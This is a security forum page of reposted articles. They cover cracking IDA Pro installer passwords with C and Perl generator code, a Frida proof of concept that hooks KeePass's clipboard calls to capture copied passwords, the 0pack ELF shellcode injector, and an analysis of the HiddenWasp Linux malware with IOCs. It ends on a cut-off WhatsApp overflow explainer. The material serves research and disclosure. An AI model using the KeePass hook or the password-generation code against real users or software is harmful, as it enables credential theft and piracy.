Jump to content

Nytro

Administrators
  • Posts

    18727
  • Joined

  • Last visited

  • Days Won

    708

Posts posted by Nytro

  1. Tech Editorials Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way

    Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way

    By Shaolin on 2019-06-21

    English Version
    中文版本

    Introduction

    Today, we are going to talk about the installation password of Hex-Rays IDA Pro, which is the most famous decompiler. What is installation password? Generally, customers receive a custom installer and installation password after they purchase IDA Pro. The installation password is required during installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install without an installation password? This is an interesting topic.

    After brainstorming with our team members, we verified the answer: Yes! With a Linux or MacOS version installer, we can easily find the password directly. With a Windows version installer, we only need 10 minutes to calculate the password. The following is the detailed process:

    * Linux and MacOS version

    The first challenge is Linux and MacOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the program memory of the running IDA Pro installer. Mission complete!

    1.png

    This problem is fixed after we reported through Hex-Rays. BitRock released InstallBuilder 19.2.0 with the protection of installation password on 2019/02/11.

    * Windows version

    It gets harder on Windows version because the installer is built with Inno Setup, which store its password with 160-bit SHA-1 hash. Therefore, we cannot get the password simply with static or dynamic analyzing the installer, and brute force is apparently not an effective way. But the situation is different if we can grasp the methodology of password generation, which lets us enumerate the password more effectively!

    Although we have realized we need to find how Hex-Rays generate password, it is still really difficult, as we do not know what language the random number generator is implemented with. There are at least 88 random number generators known. It is such a great variation.

    We first tried to find the charset used by random number generator. We collected all leaked installation passwords, such as hacking team’s password, which is leaked by WikiLeaks.

    • FgVQyXZY2XFk (link)
    • 7ChFzSbF4aik (link)
    • ZFdLqEM2QMVe (link)
    • 6VYGSyLguBfi (link)

    From the collected passwords we can summarize the charset:
    23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz

    The missing of 1, I, l, 0, O, o, N, n seems to make sense because they are confusing characters.
    Next, we guess the possible charset ordering like these:

    23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz
    ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz
    23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ
    abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ
    abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789
    ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789
    

    Lastly, we picked some common languages(c/php/python/perl)to implement a random number generator and enumerate all the combinations. Then we examined whether the collected passwords appears in the combinations. For example, here is a generator written in C language:

    #include<stdio.h>
    #include<stdlib.h>
    
    char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz";
    char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz";
    char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ";
    char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ";
    char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
    char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789";
    
    int main()
    {
            char bufa[21]={0};
            char bufb[21]={0};
            char bufc[21]={0};
            char bufd[21]={0};
            char bufe[21]={0};
            char buff[21]={0};
    
            unsigned int i=0;
            while(i<0x100000000)
            {
                    srand(i);
    
                    for(size_t n=0;n<20;n++)
                    {
                            int key= rand() % 54;
                            bufa[n]=_a[key];
                            bufb[n]=_b[key];
                            bufc[n]=_c[key];
                            bufd[n]=_d[key];
                            bufe[n]=_e[key];
                            buff[n]=_f[key];
    
                    }
                    printf("%s\n",bufa);
                    printf("%s\n",bufb);
                    printf("%s\n",bufc);
                    printf("%s\n",bufd);
                    printf("%s\n",bufe);
                    printf("%s\n",buff);
                    i=i+1;
            }
    }
    

    After a month, we finally generated the IDA Pro installation passwords successfully with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate the hacking team’s leaked password FgVQyXZY2XFk with the following script:

    #!/usr/bin/env perl
    #
    @_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
    
    $i=3326487116;
    srand($i);
    $pw="";
    
    for($i=0;$i<12;++$i)
    {
            $key = rand 54;
            $pw = $pw . $_e[$key];
    }
    print "$i $pw\n";
    

    With this, we can build a dictionary of installation password, which effectively increase the efficiency of brute force attack. Generally, we can compute the password of one installer in 10 minutes.

    We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately.

    Summary

    In this article, we discussed the possibility of installing IDA Pro without owning installation password. In the end, we found plaintext password in the program memory of Linux and MacOS version. On the other hand, we determined the password generation methodology of Windows version. Therefore, we can build a dictionary to accelerate brute force attack. Finally, we can get one password at a reasonable time.

    We really enjoy this process: surmise wisely and prove it with our best. It can broaden our experience no matter the result is correct or not. This is why we took a whole month to verify such a difficult surmise. We also take this attitude in our Red Team Assessment. You would love to give it a try!

    Lastly, we would like to thank for the friendly and rapid response from Hex-Rays. Although this issue is not included in Security Bug Bounty Program, they still generously awarded us IDA Pro Linux and MAC version, and upgraded the Windows version for us. We really appreciate it.

    Timeline

    • Jan 31, 2019 - Report to Hex-Rays
    • Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock
    • Feb 11, 2019 - BitRock released InstallBuilder 19.2.0

     

    Sursa: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/

    • Upvote 1

  2.  

    • Upvote 1
  3. Fun With Frida

    Go to the profile of James
    JamesFollow
    Jun 2
     

    In this post, we’re going to take a quick look at Frida and use it to steel credentials from KeePass.

    According to their website, Frida is a “dynamic instrumentation framework”. Essentially, it allows us to inject into a running process then interact with that process via JavaScript. It’s commonly used for mobile app testing, but is supported on Windows, OSX and *Nix as well.

    KeePass is a free and open-source password manager with official builds for Windows, but unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1).

    To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .net project in). You will also need the KeePass source from https://keepass.info/download.html

    The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard to allow them to be entered. Given that password managers allow the easy use of strong passwords, it’s a fairly safe assumption that users will be copying and pasting passwords. Lets take at look how KeePass interacts with the clipboard.

    After a bit of digging (hit: the search tool is your friend), we find some references to the “SetClipboardData” windows API call. It looks like KeePass is hooking the native Windows API to manage the clipboard.

    1*VBj0z6TiLx6A9o6ulRvx_w.png

    Looking at which calls reference this method, we find one reference within the ClipboardUtil.Windows.cs class.

    1*cIauZ5dCvvRwSlBdJAyZCA.png

    It looks like the “SetDataW” method is how KeePass interacts with the clipboard.

    private static bool SetDataW(uint uFormat, byte[] pbData)
    {
    UIntPtr pSize = new UIntPtr((uint)pbData.Length);
    IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);
    if(h == IntPtr.Zero) { Debug.Assert(false); return false; }
    Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >=
    (ulong)pbData.Length); // Might be larger
    IntPtr pMem = NativeMethods.GlobalLock(h);
    if(pMem == IntPtr.Zero)
    {
    Debug.Assert(false);
    NativeMethods.GlobalFree(h);
    return false;
    }
    Marshal.Copy(pbData, 0, pMem, pbData.Length);
    NativeMethods.GlobalUnlock(h); // May return false on success
    if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero)
    {
    Debug.Assert(false);
    NativeMethods.GlobalFree(h);
    return false;
    }
    return true;
    }

    This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location and then calls the SetClipBoardData API, passing a handle to the memory containing the contents of pbData.

    To confirm this is the code we want to target, we can add a breakpoint and debug the app. Before we can build the solution, we need to fix up the singing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (Right click -> Properties -> Signing -> uncheck “Sign the assembly” -> save).

    With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. If you get a build error, double check you have disabled signing and try again.

    1*qs3ciXwi1ESp-xzheNVh0Q.png

    In this case, the copied password was “AABBCCDD”, which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test.

    var str = System.Text.Encoding.Default.GetString(pbData);

    This will convert the pbData byte array to a string, which we can inspect with the debugger.

    1*60xIn7wgCTmsN2x34hrrFA.png

    This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn’t need to filter out any calls we don’t care about). Time to fire up Frida.

    Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple python3 script.

    import frida
    import sys
    import codecs
    def on_message(message, data):
        if message['type'] == 'send':
            print(message['payload'])
        elif message['type'] == 'error':
            print(message['stack'])
        else:
         print(message)
    try:
        session = frida.attach("KeePass.exe")
        print ("[+] Process Attached")
    except Exception as e:
        print (f"Error => {e}")
        sys.exit(0)
    with codecs.open('./Inject.js', 'r', 'utf-8') as f:
        source = f.read()
    script = session.create_script(source)
    script.on('message', on_message)
    script.load()
    try:
        while True:
            pass
    except KeyboardInterrupt:
        session.detach()
        sys.exit(0)

    This looks complicated, but doesn’t actually do that much. The interesting part happens inside the try/catch block. We attempt to attach to the “KeePass.exe” process, then inject a .js file containing our code to interact with the process and set up messaging. The “on_message” function allows messages to be received from the target process, which we just print to the console. This code is basically generic, so you can re-use it for any other process you want to target.

    Our code to interact with the process will be written in the “Inject.js” file.

    First, we need to grab a reference to the SetClipboardData API.

    var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

    We can then attach to this call, which sets up our hook.

    // Attach a hook to the native pointer
    Interceptor.attach(user32_SetClipboardData, {
     onEnter: function (args, state) {
            console.log("[+] KeePass called SetClipboardData");
     },
     
     onLeave: function (retval) {
     }
    });

    The “OnEnter” method is called as the target process calls SetClipboardData. OnLeave, as you might expect, is called just before the hooked method returns.

    I’ve added a simple console.log call to the OnEnter function, which will let us test our hook and make sure we aren’t getting any erroneous API calls showing up.

    With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the python script. You should see the “process attached” message. Unlock KeePass and copy a credential. You should see the “KeePass called SetClipboardData” message.

    1*dFNWGGRb1NiXXzdIxeF0jg.png

    KeePass, by default, clears the clipboard after 12 seconds. You will see another “KeePass called SetClipboardData” message when this occurs. We can strip that out later.

    Looking at the SetClipboardData API document, we can see that two parameters are passed.

    1*-iAe2QG7Hdz35XzOBQr7VQ.png

    A format value, and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values, I’ll leave it as an exercise for the reader to modify the PoC to support both formats fully.

    The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the “args” array. We can then use the Frida API to read data from the address passed to hMem.

    // Get native pointer to MessageBoxA
     var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
     
     // Attach a hook to the native pointer
     Interceptor.attach(user32_SetClipboardData, {
      onEnter: function (args, state) {
             console.log("[+] KeePass called SetClipboardData");
             var ptr = args[1].readPointer().readByteArray(32);
             console.log(ptr)
      },
      
      onLeave: function (retval) {
      }
     });

    Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don’t have. While it should be possible to grab this from other calls, we can side step this complexity by simply reading a set number of bytes. This may be a slightly naive approach, but it’s sufficient for our purposes.

    Kill the python script and re-run (you don’t need to re-start KeePass). Copy some data and you should see the byte array written to the console.

    1*jF6wx_2_mKV19uma2g4THQ.png

    Frida automatically formats the byte array for us. We can see the password “AABCCDD” being set on the clipboard, followed by “ — “ 12 seconds later. This is the string KeePass uses to overwrite the clipboard data.

    This is enough information to flesh out our PoC. We can convert the byte array to a string, then check if the string starts with “ — “ to remove the data when KeePass clears the clipboard. Note that is is, again, a fairly naive approach and introduces an obvious bug where a password starting with “ — “ would not be captured. Another exercise for the reader!

    This gives us our complete PoC.

    // Get native pointer to MessageBoxA
    var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")
    // Attach a hook to the native pointer
    Interceptor.attach(user32_SetClipboardData, {
     onEnter: function (args, state) {
            console.log("[+] KeePass called SetClipboardData");
            var ptr = args[1].readPointer().readByteArray(32);
            var str = ab2str(ptr);
            if(!str.startsWith("--")){
                console.log("[+] Captured Data!")
                console.log(str);        
            }
            else{
                console.log("[+] Clipboard was cleared")
            }
     },
     
     onLeave: function (retval) {
     }
    });
    function ab2str(buf){
        return String.fromCharCode.apply(null, new Uint16Array(buf));
    }

    The ab2str function converts a byte array to a string, the rest should be self explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared.

    1*OwY6bIItM-cT0cCM-_-7SA.png

    That’s all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It’s worth noting that you do not need any privileges to inject into the KeePass process, all the examples were run with KeePass and CMD running as a standard user.

     
  4. 0pack

    Description

    An ELF x64 binary payload injector written in c++ using the LIEF library. Injects shellcode written in fasm as relocations into the header. Execution begins at entrypoint 0 aka the header, this confuses or downright breaks debuggers. The whole first segment is rwx, this can be mitigated at runtime through an injected payload which sets the binaries segment to just rx.

    Compiler flags

    The targeted binary must have following flags: gcc -m64 -fPIE -pie

    Statically linking is not possible as -pie and -static are incompatible flags. Or in other terms:

    -static means a statically linked executable with no dynamic
    > relocations and only PT_LOAD segments.  -pie means a shared library with
    > dynamic relocations and PT_INTERP and PT_DYNAMIC segments.
    

    Presentation links

    HTML: https://luis-hebendanz.github.io/0pack/
    PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf
    Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm

    Debugger behaviour

    Debuggers don't generally like 0 as the entrypoint and oftentimes it is impossible to set breakpoints at the header area. Another often occured issue is that the entry0 label gets set incorrectly to the main label. Which means the attacker can purposely mislead the reverse engineer into reverse engineering fake code by jumping over the main method. Executing db entry0 in radare2 has this behaviour.

    Affected debuggers

    • radare2
    • Hopper
    • gdb
    • IDA Pro --> Not tested

    0pack help

    Injects shellcode as relocations into an ELF binary
    Usage:
      0pack [OPTION...]
    
      -d, --debug            Enable debugging
      -i, --input arg        Input file path. Required.
      -p, --payload arg      Fasm payload path.
      -b, --bin_payload arg  Binary payload path.
      -o, --output arg       Output file path. Required.
      -s, --strip            Strip the binary. Optional.
    

    -b, --bin_payload

    The bin_payload option reads a binary file and converts it to ELF relocations. 0pack appends to the binary payload a jmp to the original entrypoint.

    -p, --payload

    Needs a fasm payload, 0pack prepends and appends a "push/pop all registers" and a jmp to the original entrypoint to the payload.

    Remarks

    Altough I used the LIEF library to accomplish this task, I wouldn't encourage to use it. It is very inconsistent and intransparant in what it is doing. Often times the library is downright broken. I did not find a working library for x64 PIE enabled ELF binaries. If someone has suggestions, feel free to email me on: luis.nixos@gmail.com

    Dependencies

    • cmake version 3.12.2 or higher
    • build-essential
    • gcc
    • fasm

    Use build script

    $ ./build.sh

    Build it manually

      $ mkdir build
      $ cd build
      $ cmake ..
      $ make
      $ ./../main.elf

    Sursa: https://github.com/Luis-Hebendanz/0pack

  5. HiddenWasp Malware Stings Targeted Linux Systems

    insect-3270233_960_720-960x475.jpg

     
    Ignacio Sanmillan
     

    29.05.19 | 1:36 pm
    Share:
    FacebookTwitterLinkedIn
     
     

     

    Overview

    • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems.

    • The malware is still active and has a zero-detection rate in all major anti-virus systems.

    • Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.

    • Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.

    • HiddenWasp authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families, however the attribution is made with low confidence.

    • We have detailed our recommendations for preventing and responding to this threat.

     

    1. Introduction

    Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild.

    Unlike Windows malware, Linux malware authors do not seem to invest too much effort writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers.

    In addition, Anti-Virus solutions for Linux tend to not be as resilient as in other platforms. Therefore, threat actors targeting Linux systems are less concerned about implementing excessive evasion techniques since even when reusing extensive amounts of code, threats can relatively manage to stay under the radar.

    Nevertheless, malware with strong evasion techniques do exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilize strong evasion techniques and can be easily adapted by attackers.

    We believe this fact is alarming for the security community since many implants today have very low detection rates, making these threats difficult to detect and respond to.

    We have discovered further undetected Linux malware that appear to be enforcing advanced evasion techniques with the use of rootkits to leverage trojan-based implants.

    In this blog we will present a technical analysis of each of the different components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed to several open-source malware.

    The following images are screenshots from VirusTotal of the newer undetected malware samples discovered:

    pasted image 0 1

     

    2. Technical Analysis

    When we came across these samples we noticed that the majority of their code was unique:

    2019 05 23 084115 1215x354 scrot

    2019 05 23 084133 1201x421 scrot

    Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another.

     

    2.1 Initial Deployment Script:

    When we spotted these undetected files in VirusTotal it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary.

    2019 05 23 084551 1082x412 scrot

    We observed that these files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd.

    Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong.

    pasted image 0 10

    Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes:

    2019 05 23 085049 997x237 scrot

    Thanks to this file we were able to download further artifacts not present in VirusTotal related to this campaign. This script will start by defining a set of variables that would be used throughout the script.

    2019 05 23 085725 713x536 scrot

    Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system:

    2019 05 23 085815 1044x268 scrot

    Furthermore, after the system’s user account has been created, the script proceeds to clean the system as a means to update older variants if the system was already compromised:

    2019 05 23 090036 563x378 scrot

    The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script:

    2019 05 23 090228 818x570 scrot

    After malware components have been installed, the script will then proceed to execute the trojan:

    2019 05 23 090327 793x511 scrot

    We can see that the main trojan binary is executed, the rootkit is added to LD_PRELOAD path and another series of environment variables are set such as the ‘I_AM_HIDDEN’. We will cover throughout this post what the role of this environment variable is. To finalize, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local.

    Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly.

    2019 05 24 195845 1152x222 scrot

    The deployment script has interesting insights of further features that the malware implements, such as the introduction of a new environment variable ‘HIDE_THIS_SHELL’:

    2019 05 23 144740 819x467 scrot

    We found some of the environment variables used in a open-source rootkit known as Azazel.

    2019 05 24 053134 528x38 scrot

    It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN. We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code.

    The majority of the code from the rootkit implants involved in this malware infrastructure are noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project.

     

    2.2 The Rootkit:

    The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism.

    It is delivered in the form of an ET_DYN stripped ELF binary.

    This shared object has an DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object gets loaded by a given process:

    2019-05-29-164708_842x473_scrot.png

    Within this function we can see that eventually control flow falls into a function in charge to resolve a set of dynamic imports, which are the functions it will later hook, alongside with decoding a series of strings needed for the rootkit operations.

    pasted image 0 4

    We can see that for each string it allocates a new dynamic buffer, it copies the string to it to then decode it.

    It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit.

    When we wrote the script to simulate the cipher that implements the string decoding function we observed the following algorithm:

    2019 05 23 072903 318x253 scrot

    We recognized that a similar algorithm to the one above was used in the past by Mirai, implying that authors behind this rootkit may have ported and modified some code from Mirai.

    2019 05 23 073253 483x407 scrot

    After the rootkit main object has been loaded into the address space of a given process and has decrypted its strings, it will export the functions that are intended to be hooked. We can see these exports to be the following:

    pasted image 0 8

    For every given export, the rootkit will hook and implement a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it is checked whether the environment variable ‘I_AM_HIDDEN’ is set:

    2019 05 27 074838 796x779 scrot

    We can see an example of how the rootkit hooks the function fopen in the following screenshot:

    2019 05 23 081200 847x623 scrot

    We have observed that after checking whether the ‘I_AM_HIDDEN’ environment variable is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, specifically to the fopen function it will also check whether the file to open is ‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by scanning every entry for the destination or source ports used to communicate with the cnc, in this case 61061. This is also the default port in Azazel rootkit.

    2019 05 23 081703 569x553 scrot

    The rootkit primarily implements artifact hiding mechanisms as well as tcp connection hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in the following diagram:

    pasted image 0 6

     

    2.3 The Trojan:

    The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to some common MD5 implementation in one of the statically linked libraries it was linked with:

    pasted image 0 2

    In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared in Chinese hacking forums:

    2019 05 22 182452 629x580 scrot

    When we analyze the main we noticed that the first action the trojan takes is to retrieve its configuration:

    2019 05 23 162703 694x669 scrot

    The malware configuration is appended at the end of the file and has the following structure:

    2019-05-28-195155_776x314_scrot.png

    The malware will try to load itself from the disk and parse this blob to then retrieve the static encrypted configuration.

    2019 05 23 162730 602x688 scrot

    Once encryption configuration has been successfully retrieved the configuration will be decoded and then parsed as json.

    The cipher used to encode and decode the configuration is the following:

    2019 05 23 162515 1073x533 scrot

    This cipher seems to be an RC4 alike algorithm with an already computed PRGA generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs.

    After the configuration is decoded the following json will be retrieved:

    2019 05 23 165252 547x332 scrot

    Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker’s LD_PRELOAD path. This location is usually at /etc/ld.so.preload, however there is always a possibility to patch the dynamic linker binary to change this path:

    2019 05 23 165828 589x343 scrot

    Patch_ld function will scan for any existent /lib paths. The scanned paths are the following:

    2019 05 23 171459 539x146 scrot

    The malware will attempt to find the dynamic linker binary within these paths. The dynamic linker filename is usually prefixed with ld-<version number>.

    2019 05 23 171605 538x442 scrot

    Once the dynamic linker is located, the malware will find the offset where the /etc/ld.so.preload string is located within the binary and will overwrite it with the path of the new target preload path, that one being /sbin/.ifup-local.

    2019 05 23 171714 614x151 scrot

    To achieve this patching it will execute the following formatted string by using the xxd hex editor utility by previously having encoded the path of the rootkit in hex:

    2019 05 23 172157 752x79 scrot

    Once it has changed the default LD_PRELOAD path from the dynamic linker it will deploy a thread to enforce that the rootkit is successfully installed using the new LD_PRELOAD path. In addition, the trojan will communicate with the rootkit via the environment variable ‘I_AM_HIDDEN’ to serialize the trojan’s session for the rootkit to apply evasion mechanisms on any other sessions.

    2019 05 23 172825 1080x583 scrot

    After seeing the rootkit’s functionality, we can understand that the rootkit and trojan work together in order to help each other to remain persistent in the system, having the rootkit attempting to hide the trojan and the trojan enforcing the rootkit to remain operational. The following diagram illustrates this relationship:

    pasted image 0 3

    Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts:

    2019 05 23 173455 514x329 scrot

    These artifacts are the following:

    2019 05 23 173529 619x157 scrot

    By performing some OSINT regarding these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng hosted in GitHub:

    pasted image 0 9

    The fact that these artifacts are being searched for suggests that potentially targeted Linux systems by these implants may have already been compromised with some variant of this open-source rootkit as an additional artifact in this malware’s infrastructure. Although those paths are being searched for in order to hide their presence in the system, it is important to note that none of the analyzed artifacts related to this malware are installed in such paths.

    This finding may imply that the target systems this malware is aiming to intrude may be already known compromised targets by the same group or a third party that may be collaborating with the same end goal of this particular campaign.

    Moreover, the trojan communicated with a simple network protocol over TCP. We can see that when connection is established to the Master or Stand-By servers there is a handshake mechanism involved in order to identify the client.

    2019 05 24 005754 610x411 scrot

    With the help of this function we where able to understand the structure of the communication protocol employed. We can illustrate the structure of this communication protocol by looking at a pcap of the initial handshake between the server and client:

    pasted image 0 7

    We noticed while analyzing this protocol that the Reserved and Method fields are always constant, those being 0 and 1 accordingly. The cipher table offset represents the offset in the hardcoded key-stream that the encrypted payload was encoded with. The following is the fixed keystream this field makes reference to:

    2019-05-29-164756_1179x415_scrot.png

    After decrypting the traffic and analyzing some of the network related functions of the trojan, we noticed that the communication protocol is also implemented in json format. To show this, the following image is the decrypted handshake packets between the CNC and the trojan:

    2019 05 24 022934 892x114 scrot

    After the handshake is completed, the trojan will proceed to handle CNC requests:

    2019 05 24 023211 974x507 scrot

    Depending on the given requests the malware will perform different operations accordingly. An overview of the trojan’s functionalities performed by request handling are shown below:

    pasted image 0 5
    2.3. Prevention and Response

    Prevention: Block Command-and-Control IP addresses detailed in the IOCs section.

    Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to be able to detect these implants.

    In addition, in order to check if your system is infected, you can search for “ld.so” files — if any of the files do not contain the string ‘/etc/ld.so.preload’, your system may be compromised. This is because the trojan implant will attempt to patch instances of ld.so in order to enforce the LD_PRELOAD mechanism from arbitrary locations.

     

    4. Summary

    We analyzed every component of HiddenWasp explaining how the rootkit and trojan implants work in parallel with each other in order to enforce persistence in the system.

    We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected.

    Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.

    Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.        

     

    IOCs


    103.206.123[.]13
    103.206.122[.]245
    http://103.206.123[.]13:8080/system.tar.gz
    http://103.206.123[.]13:8080/configUpdate.tar.gz
    http://103.206.123[.]13:8080/configUpdate-32.tar.gz
    e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3
    f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d
    d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b
    0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8
    2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0
    d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0
    609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578
    8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d
    f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2
    8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b

    By Ignacio Sanmillan
     

    Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducting projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format.

     

    Sursa: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

    • Upvote 1
  6. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw

    Try it Yourself

     
    Adversary header

     

    WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself.
    clock.png10 MINUTE READ

    WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world’s most-popular messaging app with 1.5 billion monthly users from 180 countries and has always prided itself on being secure. Below, we’ll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability.

    First, what’s up with WhatsApp security?

    WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance due to the company’s early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal Messaging Protocol deployed by WhatsApp. We suspect that the company’s security eminence and focus on baking in privacy comes from the strong security mindset of WhatsApp founder Jan Koum who grew up as a hacker in the w00w00 hacker clan in the 1990s.

    But WhatsApp was then used for … surveillance?

